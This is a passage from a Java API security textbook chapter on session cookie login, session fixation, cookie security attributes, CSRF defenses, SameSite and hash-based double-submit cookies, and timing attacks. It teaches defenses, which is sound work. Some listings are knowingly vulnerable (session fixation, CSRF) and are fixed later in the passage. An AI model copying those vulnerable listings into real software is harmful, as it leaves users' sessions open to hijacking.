@Override
public String create(Request request, Token token) {
// WARNING: session fixation vulnerability!
var session = request.session(true);
session.attribute("username", token.username);
session.attribute("expiry", token.expiry);
session.attribute("attrs", token.attributes);
return session.id();
}
@Override
public Optional<Token> read(Request request, String tokenId) {
Listing 4.7
The cookie-based TokenStore
Pass true to
request.session()
to create a new
session cookie.
Store token attributes
as attributes of the
session cookie.
118
CHAPTER 4
Session cookie authentication
var session = request.session(false);
if (session == null) {
return Optional.empty();
}
var token = new Token(session.attribute("expiry"),
session.attribute("username"));
token.attributes.putAll(session.attribute("attrs"));
return Optional.of(token);
}
}
You can now wire up the TokenController to a real TokenStore implementation. Open
the Main.java file in your editor and find the lines that create the TokenController.
Replace the null argument with an instance of the CookieTokenStore as follows:
TokenStore tokenStore = new CookieTokenStore();
var tokenController = new TokenController(tokenStore);
Save the file and restart the API. You can now try out creating a new session. First cre-
ate a test user if you have not done so already:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
You can then call the new /sessions endpoint, passing in the username and password
using HTTP Basic authentication to get a new session cookie:
$ curl -i -u test:password \
-H 'Content-Type: application/json' \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Sun, 19 May 2019 09:42:43 GMT
Set-Cookie:
➥ JSESSIONID=node0hwk7s0nq6wvppqh0wbs0cha91.node0;Path=/;Secure;
➥ HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-store
Server:
Transfer-Encoding: chunked
{"token":"node0hwk7s0nq6wvppqh0wbs0cha91"}
Pass false to request.session()
to check if a valid session is
present.
Populate the Token
object with the
session attributes.
Use the -u option
to send HTTP Basic
credentials.
Spark returns a Set-
Cookie header for the
new session token.
The TokenController also
returns the token in the
response body.
119
Session cookies
4.3.1
Avoiding session fixation attacks
The code you’ve just written suffers from a subtle but widespread security flaw that
affects all forms of token-based authentication, known as a session fixation attack. After
the user authenticates, the CookieTokenStore then asks for a new session by calling
request.session(true). If the request did not have an existing session cookie, then
this will create a new session. But if the request already contains an existing session
cookie, then Spark will return that existing session and not create a new one. This can
create a security vulnerability if an attacker is able to inject their own session cookie
into another user’s web browser. Once the victim logs in, the API will change the user-
name attribute in the session from the attacker’s username to the victim’s username.
The attacker’s session token now allows them to access the victim’s account, as shown in
figure 4.8. Some web servers will produce a session cookie as soon as you access the
login page, allowing an attacker to obtain a valid session cookie before they have even
logged in.
DEFINITION
A session fixation attack occurs when an API fails to generate a new
session token after a user has authenticated. The attacker captures a session
token from loading the site on their own device and then injects that token
Attacker
Victim
API server
Login
Session cookie
https://api.example.com/login;sessid=...
Token store
Attacker
session
username=attacker
username=victim
1. The attacker first logs
in to get a session cookie.
2. They then trick the user into
logging in using the attacker’s
existing session token.
3. Once the user logs in, the attacker’s
session is updated to access the
victim’s account.
Login
sessid=...
Figure 4.8
In a session fixation attack, the attacker first logs in to obtain a valid session token. They then
inject that session token into the victim’s browser and trick them into logging in. If the existing session is not
invalidating during login then the attacker’s session will be able to access the victim’s account.
120
CHAPTER 4
Session cookie authentication
into the victim’s browser. Once the victim logs in, the attacker can use the
original session token to access the victim’s account.
Browsers will prevent a site hosted on a different origin from setting cookies for your
API, but there are still ways that session fixation attacks can be exploited. First, if the
attacker can exploit an XSS attack on your domain, or any sub-domain, then they can
use this to set a cookie. Second, Java servlet containers, which Spark uses under the
hood, support different ways to store the session token on the client. The default, and
safest, mechanism is to store the token in a cookie. But you can also configure the
servlet container to store the session by rewriting URLs produced by the site to
include the session token in the URL itself. Such URLs look like the following:
https://api.example.com/users/jim;JSESSIONID=l8Kjd…
The ;JSESSIONID=… bit is added by the container and is parsed out of the URL on sub-
sequent requests. This style of session storage makes it much easier for an attacker to
carry out a session fixation attack because they can simply lure the user to click on a
link like the following:
https://api.example.com/login;JSESSIONID=<attacker-controlled-session>
If you use a servlet container for session management, you should ensure that the ses-
sion tracking-mode is set to COOKIE in your web.xml, as in the following example:
<session-config>
<tracking-mode>COOKIE</tracking-mode>
</session-config>
This is the default in the Jetty container used by Spark. You can prevent session fixa-
tion attacks by ensuring that any existing session is invalidated after a user authenti-
cates. This ensures that a new random session identifier is generated, which the
attacker is unable to guess. The attacker’s session will be logged out. Listing 4.8 shows
the updated CookieTokenStore. First, you should check if the client has an existing
session cookie by calling request.session(false). This instructs Spark to return the
existing session, if one exists, but will return null if there is not an existing session.
Invalidate any existing session to ensure that the next call to request.session(true)
will create a new one. To eliminate the vulnerability, open CookieTokenStore.java in
your editor and update the login code to match listing 4.8.
@Override
public String create(Request request, Token token) {
var session = request.session(false);
if (session != null) {
session.invalidate();
Listing 4.8
Preventing session fixation attacks
Check if there is an
existing session and
invalidate it.
121
Session cookies
}
session = request.session(true);
session.attribute("username", token.username);
session.attribute("expiry", token.expiry);
session.attribute("attrs", token.attributes);
return session.id();
}
4.3.2
Cookie security attributes
As you can see from the output of curl, the Set-Cookie header generated by Spark sets
the JSESSIONID cookie to a random token string and sets some attributes on the
cookie to limit how it is used:
Set-Cookie:
➥ JSESSIONID=node0hwk7s0nq6wvppqh0wbs0cha91.node0;Path=/;Secure;
➥ HttpOnly
There are several standard attributes that can be set on a cookie to prevent accidental
misuse. Table 4.1 lists the most useful attributes from a security point of view.
Table 4.1
Cookie security attributes
Cookie
attribute
Meaning
Secure
Secure cookies are only ever sent over a HTTPS connection and so cannot be stolen
by network eavesdroppers.
HttpOnly
Cookies marked HttpOnly cannot be read by JavaScript, making them slightly
harder to steal through XSS attacks.
SameSite
SameSite cookies will only be sent on requests that originate from the same origin
as the cookie. SameSite cookies are covered in section 4.4.
Domain
If no Domain attribute is present, then a cookie will only be sent on requests to the
exact host that issued the Set-Cookie header. This is known as a host-only cookie. If
you set a Domain attribute, then the cookie will be sent on requests to that domain
and all sub-domains. For example, a cookie with Domain=example.com will be sent
on requests to api.example.com and www .example.com. Older versions of the cookie
standards required a leading dot on the domain value to include subdomains (such
as Domain=.example.com), but this is the only behavior in more recent versions and
so any leading dot is ignored. Don’t set a Domain attribute unless you really need the
cookie to be shared with subdomains.
Path
If the Path attribute is set to /users, then the cookie will be sent on any request to a
URL that matches /users or any sub-path such as /users/mary, but not on a request
to /cats/mrmistoffelees. The Path defaults to the parent of the request that returned
the Set-Cookie header, so you should normally explicitly set it to / if you want the
cookie to be sent on all requests to your API. The Path attribute has limited security
benefits, as it is easy to defeat by creating a hidden iframe with the correct path and
reading the cookie through the DOM.
Create a fresh session
that is unguessable to
the attacker.
122
CHAPTER 4
Session cookie authentication
You should always set cookies with the most restrictive attributes that you can get away
with. The Secure and HttpOnly attributes should be set on any cookie used for secu-
rity purposes. Spark produces Secure and HttpOnly session cookies by default. Avoid
setting a Domain attribute unless you absolutely need the same cookie to be sent to
multiple sub-domains, because if just one sub-domain is compromised then an
attacker can steal your session cookies. Sub-domains are often a weak point in web
security due to the prevalence of sub-domain hijacking vulnerabilities.
DEFINITION
Sub-domain hijacking (or sub-domain takeover) occurs when an
attacker is able to claim an abandoned web host that still has valid DNS
Expires and
Max-Age
Sets the time at which the cookie expires and should be forgotten by the client,
either as an explicit date and time (Expires) or as the number of seconds from now
(Max-Age). Max-Age is newer and preferred, but Internet Explorer only understands
Expires. Setting the expiry to a time in the past will delete the cookie immediately. If
you do not set an explicit expiry time or max-age, then the cookie will live until the
browser is closed.
Persistent cookies
A cookie with an explicit Expires or Max-Age attribute is known as a persistent cookie
and will be permanently stored by the browser until the expiry time is reached, even
if the browser is restarted. Cookies without these attributes are known as session
cookies (even if they have nothing to do with a session token) and are deleted when
the browser window or tab is closed. You should avoid adding the Max-Age or Expires
attributes to your authentication session cookies so that the user is effectively
logged out when they close their browser tab. This is particularly important on shared
devices, such as public terminals or tablets that might be used by many different peo-
ple. Some browsers will now restore tabs and session cookies when the browser is
restarted though, so you should always enforce a maximum session time on the
server rather than relying on the browser to delete cookies appropriately. You should
also consider implementing a maximum idle time, so that the cookie becomes invalid
if it has not been used for three minutes or so. Many session cookie frameworks
implement these checks for you.
Persistent cookies can be useful during the login process as a “Remember Me”
option to avoid the user having to type in their username manually, or even to auto-
matically log the user in for low-risk operations. This should only be done if trust in
the device and the user can be established by other means, such as looking at the
location, time of day, and other attributes that are typical for that user. If anything
looks out of the ordinary, then a full authentication process should be triggered. Self-
contained tokens such as JSON Web Tokens (see chapter 6) can be useful for imple-
menting persistent cookies without storing long-lived state on the server.
Table 4.1
Cookie security attributes (continued)
Cookie
attribute
Meaning
123
Session cookies
records configured. This typically occurs when a temporary site is created on
a shared service like GitHub Pages and configured as a sub-domain of the
main website. When the site is no longer required, it is deleted but the DNS
records are often forgotten. An attacker can discover these DNS records and
re-register the site on the shared web host, under the attacker's control. They
can then serve their content from the compromised sub-domain.
Some browsers also support naming conventions for cookies that enforce that the
cookie must have certain security attributes when it is set. This prevents accidental
mistakes when setting cookies and ensures an attacker cannot overwrite the cookie
with one with weaker attributes. These cookie name prefixes are likely to be incorpo-
rated into the next version of the cookie specification. To activate these defenses, you
should name your session cookie with one of the following two special prefixes:
__Secure-—Enforces that the cookie must be set with the Secure attribute and
set by a secure origin.
__Host-—Enforces the same protections as __Secure-, but also enforces that
the cookie is a host-only cookie (has no Domain attribute). This ensures that
the cookie cannot be overwritten by a cookie from a sub-domain and is a signif-
icant protection against sub-domain hijacking attacks.
NOTE
These prefixes start with two underscore characters and include a
hyphen at the end. For example, if your cookie was previously named “ses-
sion,” then the new name with the host prefix would be “__Host-session.”
4.3.3
Validating session cookies
You’ve now implemented cookie-based login, but the API will still reject requests that
do not supply a username and password, because you are not checking for the session
cookie anywhere. The existing HTTP Basic authentication filter populates the subject
attribute on the request if valid credentials are found, and later access control filters
check for the presence of this subject attribute. You can allow requests with a session
cookie to proceed by implementing the same contract: if a valid session cookie is pres-
ent, then extract the username from the session and set it as the subject attribute in
the request, as shown in listing 4.9. If a valid token is present on the request and not
expired, then the code sets the subject attribute on the request and populates any
other token attributes. To add token validation, open TokenController.java in your
editor and add the validateToken method from the listing and save the file.
WARNING
This code is vulnerable to Cross-Site Request Forgery attacks. You will
fix these attacks in section 4.4.
public void validateToken(Request request, Response response) {
// WARNING: CSRF attack possible
tokenStore.read(request, null).ifPresent(token -> {
if (now().isBefore(token.expiry)) {
Listing 4.9
Validating a session cookie
Check if a token is
present and not expired.
124
CHAPTER 4
Session cookie authentication
request.attribute("subject", token.username);
token.attributes.forEach(request::attribute);
}
});
}
Because the CookieTokenStore can determine the token associated with a request by
looking at the cookies, you can leave the tokenId argument null for now when look-
ing up the token in the tokenStore. The alternative token store implementations
described in chapter 5 all require a token ID to be passed in, and as you will see in the
next section, this is also a good idea for session cookies, but for now it will work fine
without one.
To wire up the token validation filter, navigate back to the Main.java file in your
editor and locate the line that adds the current UserController authentication filter
(that implements HTTP Basic support). Add the TokenController validateToken()
method as a new before() filter right after the existing filter:
before(userController::authenticate);
before(tokenController::validateToken);
If either filter succeeds, then the subject attribute will be populated in the request and
subsequent access control checks will pass. But if neither filter finds valid authenti-
cation credentials then then subject attribute will remain null in the request and
access will be denied for any request that requires authentication. This means that the
API can continue to support either method of authentication, providing flexibility
for clients.
Restart the API and you can now try out making requests using a session cookie
instead of using HTTP Basic on every request. First, create a test user as before:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
Next, call the /sessions endpoint to login, passing the username and password as
HTTP Basic authentication credentials. You can use the -c option to curl to save any
cookies on the response to a file (known as a cookie jar):
$ curl -i -c /tmp/cookies -u test:password \
-H 'Content-Type: application/json' \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Sun, 19 May 2019 19:15:33 GMT
Set-Cookie:
➥ JSESSIONID=node0l2q3fc024gw8wq4wp961y5rk0.node0;
➥ Path=/;Secure;HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json
Populate the request subject attribute and
any attributes associated with the token.
Use the -c option to
save cookies from the
response to a file.
The server returns a
Set-Cookie header for
the session cookie.
125
Preventing Cross-Site Request Forgery attacks
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-store
Server:
Transfer-Encoding: chunked
{"token":"node0l2q3fc024gw8wq4wp961y5rk0"}
Finally, you can make a call to an API endpoint. You can either manually create a
Cookie header, or you can use curl’s -b option to send any cookies from the cookie jar
you created in the previous request:
$ curl -b /tmp/cookies \
-H 'Content-Type: application/json' \
-d '{"name":"test space","owner":"test"}' \
https://localhost:4567/spaces
{"name":"test space","uri":"/spaces/1"}
4.4
Preventing Cross-Site Request Forgery attacks
Imagine that you have logged into Natter and then receive a message from Polly in
Marketing with a link inviting you to order some awesome Manning books with a 20%
discount. So eager are you to take up this fantastic offer that you click it without think-
ing. The website loads but tells you that the offer has expired. Disappointed, you
return to Natter to ask your friend about it, only to discover that someone has some-
how managed to post abusive messages to some of your friends, apparently sent by
you! You also seem to have posted the same offer link to your other friends.
Pop quiz
2
What is the best way to avoid session fixation attacks?
a
Ensure cookies have the Secure attribute.
b
Only allow your API to be accessed over HTTPS.
c
Ensure cookies are set with the HttpOnly attribute.
d
Add a Content-Security-Policy header to the login response.
e
Invalidate any existing session cookie after a user authenticates.
3
Which cookie attribute should be used to prevent session cookies being read from
JavaScript?
a
Secure
b
HttpOnly
c
Max-Age=-1
d
SameSite=lax
e
SameSite=strict
The answers are at the end of the chapter.
Use the -b option to curl to send
cookies from a cookie jar.
The request succeeds as the
session cookie was validated.
126
CHAPTER 4
Session cookie authentication
The appeal of cookies as an API designer is that, once set, the browser will trans-
parently add them to every request. As a client developer, this makes life simple. After
the user has redirected back from the login endpoint, you can just make API requests
without worrying about authentication credentials. Alas, this strength is also one of
the greatest weaknesses of session cookies. The browser will also attach the same cook-
ies when requests are made from other sites that are not your UI. The site you visited
when you clicked the link from Polly loaded some JavaScript that made requests to the
Natter API from your browser window. Because you’re still logged in, the browser hap-
pily sends your session cookie along with those requests. To the Natter API, those
requests look as if you had made them yourself.
As shown in figure 4.9, in many cases browsers will happily let a script from
another website make cross-origin requests to your API; it just prevents them from
reading any response. Such an attack is known as Cross-Site Request Forgery because
Web browser
Natter API
Login
Web browser
Natter API
Response
Web browser
Natter API
Message
Natter UI
Natter UI
Malicious UI
Cookie
Web browser
Natter API
Response
Malicious UI
Cookie
Time
Cookie
Cookie
Cookie
1. User logs in with the Natter API.
2. User receives a session cookie.
3. User visits a malicious site . . .
4. . . . that makes a request to the Natter API.
5. The browser includes the session cookie,
so the request succeeds!
6. Only the response is blocked by the browser.
Figure 4.9
In a CSRF attack, the user first visits the legitimate site and logs in to get a session
cookie. Later, they visit a malicious site that makes cross-origin calls to the Natter API. The browser
will send the requests and attach the cookies, just like in a genuine request. The malicious script is
only blocked from reading the response to cross-origin requests, not stopped from making them.
127
Preventing Cross-Site Request Forgery attacks
the malicious site can create fake requests to your API that appear to come from a
genuine client.
DEFINITION
Cross-site request forgery (CSRF, pronounced “sea-surf”) occurs
when an attacker makes a cross-origin request to your API and the browser
sends cookies along with the request. The request is processed as if it was gen-
uine unless extra checks are made to prevent these requests.
For JSON APIs, requiring an application/json Content-Type header on all requests
makes CSRF attacks harder to pull off, as does requiring another nonstandard header
such as the X-Requested-With header sent by many JavaScript frameworks. This is
because such nonstandard headers trigger the same-origin policy protections described
in section 4.2.2. But attackers have found ways to bypass such simple protections, for
example, by using flaws in the Adobe Flash browser plugin. It is therefore better to
design explicit CSRF defenses into your APIs when you accept cookies for authentica-
tion, such as the protections described in the next sections.
TIP
An important part of protecting your API from CSRF attacks is to ensure
that you never perform actions that alter state on the server or have other
real-world effects in response to GET requests. GET requests are almost
always allowed by browsers and most CSRF defenses assume that they are safe.
4.4.1
SameSite cookies
There are several ways that you can prevent CSRF attacks. When the API is hosted on
the same domain as the UI, you can use a new technology known as SameSite cookies to
significantly reduce the possibility of CSRF attacks. While still a draft standard (https://
tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-03#section-5.3.7), SameSite cookies
are already supported by the current versions of all major browsers. When a cookie is
marked as SameSite, it will only be sent on requests that originate from the same
registerable domain that originally set the cookie. This means that when the malicious
site from Polly’s link tries to send a request to the Natter API, the browser will send
it without the session cookie and the request will be rejected by the server, as shown in
figure 4.10.
DEFINITION
A SameSite cookie will only be sent on requests that originate
from the same domain that originally set the cookie. Only the registerable
domain is examined, so api.payments.example.com and www .example.com
are considered the same site, as they both have the registerable domain of
example.com. On the other hand, www .example.org (different suffix) and
www .different.com are considered different sites. Unlike an origin, the proto-
col and port are not considered when making same-site decisions.
128
CHAPTER 4
Session cookie authentication
The public suffix list
SameSite cookies rely on the notion of a registerable domain, which consists of a
top-level domain plus one more level. For example, .com is a top-level domain, so
example.com is a registerable domain, but foo.example.com typically isn't. The situ-
ation is made more complicated because there are some domain suffixes such as
.co.uk, which aren’t strictly speaking a top-level domain (which would be .uk) but
should be treated as if they are. There are also websites like github.io that allow any-
body to sign up and register a sub-domain, such as neilmadden.github.io, making
github.io also effectively a top-level domain.
Because there are no simple rules for deciding what is or isn’t a top-level domain,
Mozilla maintains an up-to-date list of effective top-level domains (eTLDs), known as
the public suffix list (https://publicsuffix.org). A registerable domain in SameSite is
an eTLD plus one extra level, or eTLD + 1 for short. You can submit your own website
to the public suffix list if you want your sub-domains to be treated as effectively inde-
pendent websites with no cookie sharing between them, but this is quite a drastic
measure to take.
Web browser
Natter API
Login
Web browser
Natter API
Response
Web browser
Natter API
Message
Natter UI
Natter UI
Malicious
UI
SameSite
cookie
SameSite
cookie
1. User logs in with the Natter API.
2. User receives a session cookie with
SameSite=strict or SameSite=lax.
3. User visits a malicious site . . .
4. . . . that makes a request to the Natter API.
5. The cookie is marked as SameSite,
so the browser does not send it.
6. The unauthenticated request
is blocked by the API.
SameSite
cookie
Time
Figure 4.10
When a cookie is marked as SameSite=strict or SameSite=lax, then the browser
will only send it on requests that originate from the same domain that set the cookie. This
prevents CSRF attacks, because cross-domain requests will not have a session cookie and so
will be rejected by the API.
129
Preventing Cross-Site Request Forgery attacks
To mark a cookie as SameSite, you can add either SameSite=lax or SameSite=strict on
the Set-Cookie header, just like marking a cookie as Secure or HttpOnly (section 4.3.2).
The difference between the two modes is subtle. In strict mode, cookies will not be
sent on any cross-site request, including when a user just clicks on a link from one site
to another. This can be a surprising behavior that might break traditional websites. To
get around this, lax mode allows cookies to be sent when a user directly clicks on a
link but will still block cookies on most other cross-site requests. Strict mode should be
preferred if you can design your UI to cope with missing cookies when following links.
For example, many single-page apps work fine in strict mode because the first request
when following a link just loads a small HTML template and the JavaScript imple-
menting the SPA. Subsequent calls from the SPA to the API will be allowed to include
cookies as they originate from the same site.
TIP
Recent versions of Chrome have started marking cookies as Same-
Site=lax by default.1 Other major browsers have announced intentions to
follow suit. You can opt out of this behavior by explicitly adding a new Same-
Site=none attribute to your cookies, but only if they are also Secure. Unfortu-
nately, this new attribute is not compatible with all browsers.
SameSite cookies are a good additional protection measure against CSRF attacks,
but they are not yet implemented by all browsers and frameworks. Because the
notion of same site includes sub-domains, they also provide little protection against
sub-domain hijacking attacks. The protection against CSRF is as strong as the weak-
est sub-domain of your site: if even a single sub-domain is compromised, then all
protection is lost. For this reason, SameSite cookies should be implemented as a
defense-in-depth measure. In the next section you will implement a more robust
defense against CSRF.
4.4.2
Hash-based double-submit cookies
The most effective defense against CSRF attacks is to require that the caller prove that
they know the session cookie, or some other unguessable value associated with the ses-
sion. A common pattern for preventing CSRF in traditional web applications is to gen-
erate a random string and store it as an attribute on the session. Whenever the
application generates an HTML form, it includes the random token as a hidden field.
When the form is submitted, the server checks that the form data contains this hidden
field and that the value matches the value stored in the session associated with the
cookie. Any form data that is received without the hidden field is rejected. This effec-
tively prevents CSRF attacks because an attacker cannot guess the random fields and
so cannot forge a correct request.
1 At the time of writing, this initiative has been paused due to the global COVID-19 pandemic.
130
CHAPTER 4
Session cookie authentication
An API does not have the luxury of adding hidden form fields to requests because
most API clients want JSON or another data format rather than HTML. Your API must
therefore use some other mechanism to ensure that only valid requests are processed.
One alternative is to require that calls to your API include a random token in a custom
header, such as X-CSRF-Token, along with the session cookie. A common approach is to
store this extra random token as a second cookie in the browser and require that it be
sent as both a cookie and as an X-CSRF-Token header on each request. This second
cookie is not marked HttpOnly, so that it can be read from JavaScript (but only from
the same origin). This approach is known as a double-submit cookie, as the cookie is sub-
mitted to the server twice. The server then checks that the two values are equal as
shown in figure 4.11.
DEFINITION
A double-submit cookie is a cookie that must also be sent as a custom
header on every request. As cross-origin scripts are not able to read the value
of the cookie, they cannot create the custom header value, so this is an effec-
tive defense against CSRF attacks.
This traditional solution has some problems, because although it is not possible to
read the value of the second cookie from another origin, there are several ways that
the cookie could be overwritten by the attacker with a known value, which would then
let them forge requests. For example, if the attacker compromises a sub-domain of
your site, they may be able to overwrite the cookie. The __Host- cookie name prefix
discussed in section 4.3.2 can help protect against these attacks in modern browsers by
preventing a sub-domain from overwriting the cookie.
A more robust solution to these problems is to make the second token be cryp-
tographically bound to the real session cookie.
DEFINITION
An object is cryptographically bound to another object if there is an
association between them that is infeasible to spoof.
Rather than generating a second random cookie, you will run the original session
cookie through a cryptographically secure hash function to generate the second token. This
ensures that any attempt to change either the anti-CSRF token or the session cookie will
be detected because the hash of the session cookie will no longer match the token.
Because the attacker cannot read the session cookie, they are unable to compute the
correct hash value. Figure 4.12 shows the updated double-submit cookie pattern. Unlike
the password hashes used in chapter 3, the input to the hash function is an unguessable
string with high entropy. You therefore don’t need to worry about slowing the hash
function down because an attacker has no chance of trying all possible session tokens.
DEFINITION
A hash function takes an arbitrarily sized input and produces a
fixed-size output. A hash function is cryptographically secure if it is infeasible to
work out what input produced a given output without trying all possible
inputs (known as preimage resistance), or to find two distinct inputs that pro-
duce the same output (collision resistance).
131
Preventing Cross-Site Request Forgery attacks
API
server
Web browser
Login
Response
Cookie
API
server
Web browser
API request
Cookie
Cookie
X-CSRF-Token=abc...
API
server
Web browser
API request
Cookie
Cookie
X-CSRF-Token=??
Malicious site
1. When the user logs in, the
server generates a random
CSRF-Token.
2. The API returns the CSRF
token in a second cookie
without HttpOnly.
4. If the X-CSRF-Token header
matches the cookie, then
the request is allowed.
5. A malicious site is unable to read
or guess the CSRF cookie, so the
request is blocked.
Legitimate
client
Legitimate
client
Malicious
client
Set-Cookie: csrfToken=abc...
Cookie
Cookie
The browser stores the
CSRF cookie alongside
the session cookie.
Cookie
Cookie
Cookie
3. The client extracts the
csrfCookie and sends
it as another header.
Web browser
Malicious
client
Cookie
Cookie
In some cases, the malicious
client can overwrite the CSRF
cookie with a known value . . .
API
server
API request
X-CSRF-Token=xyz...
xyz...
Cookie
Cookie
. . . letting it make
CSRF requests again.
Figure 4.11
In the double-submit cookie pattern, the server avoids storing a second token
by setting it as a second cookie on the client. When the legitimate client makes a request,
it reads the CSRF cookie value (which cannot be marked HttpOnly) and sends it as an
additional header. The server checks that the CSRF cookie matches the header. A malicious
client on another origin is not able to read the CSRF cookie and so cannot make requests.
But if the attacker compromises a sub-domain, they can overwrite the CSRF cookie with a
known value.
132
CHAPTER 4
Session cookie authentication
The security of this scheme depends on the security of the hash function. If the
attacker can easily guess the output of the hash function without knowing the input,
then they can guess the value of the CSRF cookie. For example, if the hash function
only produced a 1-byte output, then the attacker could just try each of the 256 possi-
ble values. Because the CSRF cookie will be accessible to JavaScript and might be acci-
dentally sent over insecure channels, while the session cookie isn’t, the hash function
should also make sure that an attacker isn’t able to reverse the hash function to dis-
cover the session cookie value if the CSRF token value accidentally leaks. In this section,
API
server
Web browser
Login
Response
Cookie
API
server
Web browser
API request
Cookie
Cookie
X-CSRF-Token=abc...
1. When the user logs in, the
server computes a CSRF
token as the SHA-256
hash of the session cookie.
2. The API returns the CSRF
token as a second cookie.
4. If the X-CSRF-Token header
matches the SHA-256 hash
of the session cookie, then
the request is allowed.
Legitimate
client
Legitimate
client
3. The client sends the
CSRF hash in a custom
header with each request.
Web browser
Cookie
Cookie
If a malicious client tries to
overwrite the CSRF cookie,
the hash will no longer match . . .
API
server
API request
X-CSRF-Token=xyz...
xyz...
Cookie
Cookie
Token store
Session: xyz...
Set-Cookie: csrfToken=abc...
csrfToken = SHA-256(xyz...)
= abc..
Cookie
Cookie
The csrfToken cookie is
ignored by the server
. . . so the request
will be blocked.
Malicious
client
Figure 4.12
In the hash-based double-submit cookie pattern, the anti-CSRF token is computed
as a secure hash of the session cookie. As before, a malicious client is unable to guess the correct
value. However, they are now also prevented from overwriting the CSRF cookie because they
cannot compute the hash of the session cookie.
133
Preventing Cross-Site Request Forgery attacks
you will use the SHA-256 hash function. SHA-256 is considered by most cryptogra-
phers to be a secure hash function.
DEFINITION
SHA-256 is a cryptographically secure hash function designed by
the US National Security Agency that produces a 256-bit (32-byte) output
value. SHA-256 is one variant of the SHA-2 family of secure hash algorithms
specified in the Secure Hash Standard (https://doi.org/10.6028/NIST.FIPS
.180-4), which replaced the older SHA-1 standard (which is no longer consid-
ered secure). SHA-2 specifies several other variants that produce different
output sizes, such as SHA-384 and SHA-512. There is also now a newer SHA-3
standard (selected through an open international competition), with variants
named SHA3-256, SHA3-384, and so on, but SHA-2 is still considered secure
and is widely implemented.
4.4.3
Double-submit cookies for the Natter API
To protect the Natter API, you will implement hash-based double-submit cookies as
described in the last section. First, you should update the CookieTokenStore create
method to return the SHA-256 hash of the session cookie as the token ID, rather than
the real value. Java’s MessageDigest class (in the java.security package) imple-
ments a number of cryptographic hash functions, and SHA-256 is implemented by all
current Java environments. Because SHA-256 returns a byte array and the token ID
should be a String, you can Base64-encode the result to generate a string that is safe
to store in a cookie or header. It is common to use the URL-safe variant of Base64 in
web APIs, because it can be used almost anywhere in a HTTP request without addi-
tional encoding, so that is what you will use here. Listing 4.10 shows a simplified inter-
face to the standard Java Base64 encoding and decoding libraries implementing the
URL-safe variant. Create a new file named Base64url.java inside the src/main/java/
com/manning/apisecurityinaction/token folder with the contents of the listing.
package com.manning.apisecurityinaction.token;
import java.util.Base64;
public class Base64url {
private static final Base64.Encoder encoder =
Base64.getUrlEncoder().withoutPadding();
private static final Base64.Decoder decoder =
Base64.getUrlDecoder();
public static String encode(byte[] data) {
return encoder.encodeToString(data);
}
public static byte[] decode(String encoded) {
return decoder.decode(encoded);
}
}
Listing 4.10
URL-safe Base64 encoding
Define static
instances of the
encoder and
decoder objects.
Define simple
encode and
decode methods.
134
CHAPTER 4
Session cookie authentication
The most important part of the changes is to enforce that the CSRF token supplied by
the client in a header matches the SHA-256 hash of the session cookie. You can per-
form this check in the CookieTokenStore read method by comparing the tokenId
argument provided to the computed hash value. One subtle detail is that you should
compare the computed value against the provided value using a constant-time equal-
ity function to avoid timing attacks that would allow an attacker to recover the CSRF
token value just by observing how long it takes your API to compare the provided
value to the computed value. Java provides the MessageDigest.isEqual method to
compare two byte-arrays for equality in constant time,2 which you can use as follows to
compare the provided token ID with the computed hash:
var provided = Base64.getUrlDecoder().decode(tokenId);
var computed = sha256(session.id());
if (!MessageDigest.isEqual(computed, provided)) {
return Optional.empty();
}
2 In older versions of Java, MessageDigest.isEqual wasn’t constant-time and you may find old articles about
this such as https://codahale.com/a-lesson-in-timing-attacks/. This has been fixed in Java for a decade now
so you should just use MessageDigest.isEqual rather than writing your own equality method.
Timing attacks
A timing attack works by measuring tiny differences in the time it takes a computer
to process different inputs to work out some information about a secret value that
the attacker does not know. Timing attacks can measure even very small differences
in the time it takes to perform a computation, even when carried out over the internet.
The classic paper Remote Timing Attacks are Practical by David Brumley and Dan
Boneh of Stanford (2005; https://crypto.stanford.edu/~dabo/papers/ssl-timing.pdf)
demonstrated that timing attacks are practical for attacking computers on the same
local network, and the techniques have been developed since then. Recent research
shows you can remotely measure timing differences as low as 100 nanoseconds over
the internet (https://papers.mathyvanhoef.com/usenix2020.pdf).
Consider what would happen if you used the normal String equals method to com-
pare the hash of the session ID with the anti-CSRF token received in a header. In
most programming languages, including Java, string equality is implemented with a
loop that terminates as soon as the first non-matching character is found. This
means that the code takes very slightly longer to match if the first two characters
match than if only a single character matches. A sophisticated attacker can measure
even this tiny difference in timing. They can then simply keep sending guesses for
the anti-CSRF token. First, they try every possible value for the first character (64 pos-
sibilities because we are using base64-encoding) and pick the value that took slightly
longer to respond. Then they do the same for the second character, and then the
third, and so on. By finding the character that takes slightly longer to respond at each
step, they can slowly recover the entire anti-CSRF token using time only proportional
135
Preventing Cross-Site Request Forgery attacks
To update the implementation, open CookieTokenStore.java in your editor and update
the code to match listing 4.11. The new parts are highlighted in bold. Save the file
when you are happy with the changes.
package com.manning.apisecurityinaction.token;
import java.nio.charset.StandardCharsets;
import java.security.*;
import java.util.*;
import spark.Request;
public class CookieTokenStore implements TokenStore {
@Override
public String create(Request request, Token token) {
var session = request.session(false);
if (session != null) {
session.invalidate();
}
session = request.session(true);
session.attribute("username", token.username);
session.attribute("expiry", token.expiry);
session.attribute("attrs", token.attributes);
to its length, rather than needing to try every possible value. For a 10-character Base64-
encoded string, this changes the number of guesses needed from around 6410 (over
1 quintillion possibilities) to just 640. Of course, this attack needs many more requests
to be able to accurately measure such small timing differences (typically many thou-
sands of requests per character), but the attacks are improving all the time.
The solution to such timing attacks is to ensure that all code that performs compar-
isons or lookups using secret values take a constant amount of time regardless of
the value of the user input that is supplied. To compare two strings for equality, you
can use a loop that does not terminate early when it finds a wrong value. The follow-
ing code uses bitwise XOR (^) and OR (|) operators to check if two strings are equal.
The value of c will only be zero at the end if every single character was identical.
if (a.length != b.length) return false;
int c = 0;
for (int i = 0; i < a.length; i++)
c |= (a[i] ^ b[i]);
return c == 0;
This code is very similar to how MessageDigest.isEqual is implemented in Java.
